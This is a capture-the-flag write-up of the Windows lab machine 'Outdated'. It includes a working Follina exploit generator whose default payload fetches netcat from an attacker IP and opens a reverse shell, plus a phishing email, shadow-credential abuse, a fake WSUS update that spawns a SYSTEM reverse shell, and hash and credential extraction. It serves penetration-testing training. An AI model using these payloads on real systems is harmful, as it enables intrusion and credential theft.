Outdated is a medium-difficulty Windows box that strings together three captivating attack primitives: exploiting the Follina vulnerability via a malicious link sent to an email address harvested from an SMB share, lateral movement through shadow credentials, and ultimately abusing Windows Server Update Services (WSUS) to push a fake update and gain SYSTEM on the domain controller. In Beyond Root, I’ll revisit the intended path that involved HiveNightmare and PyWhisker, which I was able to bypass with a direct Whisker compilation.
| Field | Value |
|---|---|
| Name | Outdated |
| OS | Windows |
| Difficulty | Medium |
| Release | 13 Aug 2022 |
| Retire | 10 Dec 2022 |
| User blood | 00:17:09 (original: guglia001) |
| Root blood | 00:16:33 (original: guglia001) |
| Creator | ctrlzero |
A full TCP scan reveals a rich set of services typical for a Windows domain controller, along with extra ports that hint at WSUS:
mursalin@kali$ nmap -p- --min-rate 10000 10.10.11.122
...
25/tcp open smtp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
587/tcp open submission
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8530/tcp open http
8531/tcp open unknown
9389/tcp open adws
...Service version detection confirms the hostnames dc.outdated.htb, mail.outdated.htb and the domain outdated.htb. I add these to /etc/hosts:
10.10.11.122 dc.outdated.htb mail.outdated.htb outdated.htb
An SMB null session reveals an interesting share named Shares, which contains a single PDF:
mursalin@kali$ smbclient -N //10.10.11.122/shares
smb: \> ls
NOC_Reminder.pdf AR 106977 Mon Jun 20 15:00:32 2022
smb: \> get NOC_Reminder.pdfThe document is a “NOC Reminder” that asks employees to send links to web applications to itsupport@outdated.htb for testing. It also lists several CVEs, most notably CVE-2022-30190 (Follina). This immediately tells me that phishing the IT support user with a Follina payload is the intended initial access.
Follina abuses the ms-msdt:/ protocol handler. When a user opens a malicious Office document or, crucially, simply visits an attacker‑controlled HTML page that redirects to a specially crafted ms-msdt: URL longer than 4096 bytes, the Microsoft Diagnostic Tool executes arbitrary PowerShell code without any prompt.
I’ll craft a minimal HTML payload that triggers the bug and fetches a reverse shell.
I use a short Python script that takes a command, base64‑encodes it, and wraps it in JavaScript that redirects to the ms-msdt: URL, padded to >4096 bytes with random letters:
#!/usr/bin/env python3
import base64, random, string, sys
command = sys.argv[1] if len(sys.argv) > 1 else "IWR http://10.10.14.6/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe 10.10.14.6 443 -e cmd"
b64_payload = base64.b64encode(command.encode()).decode()
html = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{b64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html += ''.join(random.choice(string.ascii_lowercase) for _ in range(4096)) + "\n</script>"
print(html)I save the output to msdt.html and serve it with Python’s HTTP server.
Using swaks, I send an email to itsupport@outdated.htb:
mursalin@kali$ swaks --to itsupport@outdated.htb --from "mursalin@mursalin.htb" \
--header "Subject: Internal web app" --body "http://10.10.14.6/msdt.html"Moments later, I receive two HTTP requests—one for the HTML page, one for nc64.exe—and then a reverse shell:
mursalin@kali$ rlwrap -cAr nc -lvnp 443
Connection received on 10.10.11.122 49804
Microsoft Windows [Version 10.0.19043.928]
...
C:\Users\btables\AppData\Local\Temp\SDIAG_...> powershellI’m now outdated\btables on a machine named CLIENT. It’s actually a Hyper‑V container, as revealed by its IP (172.16.20.20), but it is domain‑joined.
I upload SharpHound.exe and run it:
PS C:\programdata> iwr http://10.10.14.6/SharpHound.exe -outfile s.exe
PS C:\programdata> .\s.exe -C allExfiltrating the ZIP via an impromptu SMB share, I open BloodHound, mark btables as owned, and examine its outbound control rights. The user belongs to the ITSTAFF group, which has AddKeyCredentialLink (shadow credentials) over the user sflowers.
Because I’m already running as btables inside the container, I can simply execute the Windows tool Whisker without needing to know btables’ password. I compile Whisker from source (cloning the repo into Visual Studio) and upload the resulting Whisker.exe to the CLIENT.
First, I verify there are no existing shadow credentials for sflowers:
PS C:\programdata> .\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
[*] No entries!Now I add one with a password of my choosing:
PS C:\programdata> .\w.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:MursalinPass123!
[+] Updated the msDS-KeyCredentialLink attribute of the target objectWhisker outputs a Rubeus command that will request a TGT using the newly added certificate. I download a pre‑compiled Rubeus.exe and run it:
PS C:\programdata> .\r.exe asktgt /user:sflowers /certificate:... /password:"MursalinPass123!" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
...
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5I now have sflowers’ NTLM hash.
BloodHound shows that sflowers is a member of Remote Management Users, so I can use Evil‑WinRM to reach the domain controller:
mursalin@kali$ evil-winrm -u sflowers -i dc.outdated.htb -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
*Evil-WinRM* PS C:\Users\sflowers\Documents> cat ../desktop/user.txt
c107c589************************Windows Server Update Services (WSUS) allows centralised patch management. The WSUS Administrators group—of which sflowers is a member—can approve and deploy updates to domain‑joined machines. Since the domain controller itself is a WSUS client, we can weaponise this to execute arbitrary commands as SYSTEM.
I compile SharpWSUS from the same repository and upload it to the DC.
SharpWSUS locates the server automatically, and also enumerates clients:
*Evil-WinRM* PS C:\programdata> .\sw.exe locate
WSUS Server: http://wsus.outdated.htb:8530
*Evil-WinRM* PS C:\programdata> .\sw.exe inspect
...
ComputerName, IPAddress, OSVersion
dc.outdated.htb, 172.16.20.1, 10.0.17763.652Only the DC itself appears, which is exactly where I want SYSTEM.
WSUS only allows signed Microsoft binaries to be deployed, but that’s not a problem—I’ll use Microsoft’s own PsExec.exe from Sysinternals. I upload PsExec64.exe and nc64.exe to C:\programdata\.
Now I create the update payload:
*Evil-WinRM* PS C:\programdata> .\sw.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445" /title:"Critical Patch"
...
[*] Update created – When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"I immediately approve it:
*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"
[+] Approved UpdateAfter a short wait, my netcat listener catches a SYSTEM shell:
mursalin@kali$ rlwrap -cAr nc -lvnp 445
Connection received on 10.10.11.122 49944
Microsoft Windows [Version 10.0.17763.737]
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
d4ec65b6************************The box author intended for players to first retrieve btables’ password using the HiveNightmare vulnerability (CVE-2021-36934) and then run the Python version of Whisker (PyWhisker) from the attack host. I bypassed this step entirely by running Whisker.exe directly inside the container, but it’s still a useful alternative to demonstrate.
On the CLIENT machine, the SAM registry hive is world‑readable:
C:\> icacls C:\windows\system32\config\SAM
...
BUILTIN\Users:(I)(RX)
I upload the compiled HiveNightmare.exe and run it. It automatically mounts shadow copies and extracts the SAM, SECURITY, and SYSTEM hives into the current directory. After copying them to my attacker box via an SMB share, I use secretsdump.py to extract local hashes and, critically, a plaintext domain credential:
mursalin@kali$ secretsdump.py -sam SAM-2022-08-02 -security SECURITY-2022-08-02 -system SYSTEM-2022-08-02 local
...
[*] DefaultPassword
(Unknown User):5myBPLPDKT3BfqTesting with CrackMapExec confirms it belongs to btables:
mursalin@kali$ crackmapexec smb 10.10.11.122 -u btables -p '5myBPLPDKT3Bfq'
[+] outdated.htb\btables:5myBPLPDKT3BfqWith valid credentials, I can now use PyWhisker from my Kali machine. The domain enforces LDAPS, so I add --use-ldaps:
mursalin@kali$ python /opt/pywhisker/pywhisker.py --action add -d outdated.htb -u btables -p '5myBPLPDKT3Bfq' --dc-ip 10.10.11.122 -t sflowers --use-ldaps
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX certificate & key at path: alTWylpv.pfx
[*] Must be used with password: CpgwxPvDtXvsf4wNjjgNThen, using PKINITtools, I request a TGT and recover the NT hash:
mursalin@kali$ python /opt/PKINITtools/gettgtpkinit.py -cert-pfx alTWylpv.pfx -pfx-pass CpgwxPvDtXvsf4wNjjgN outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.122
mursalin@kali$ export KRB5CCNAME=sflowers.ccache
mursalin@kali$ python /opt/PKINITtools/getnthash.py outdated.htb/sflowers -key <AS-REP key>
Recovered NT Hash
1fcdb1f6015dcb318cc77bb2bda14db5From there, the same WinRM and WSUS steps apply. Having both paths available shows how the ecosystem of tooling has evolved to make attacks like these portable and scriptable.
That wraps up Outdated – a brilliantly designed box that forces you to chain a realistic phishing scenario with modern Active Directory tradecraft. I thoroughly enjoyed every stage.
~ Mursalin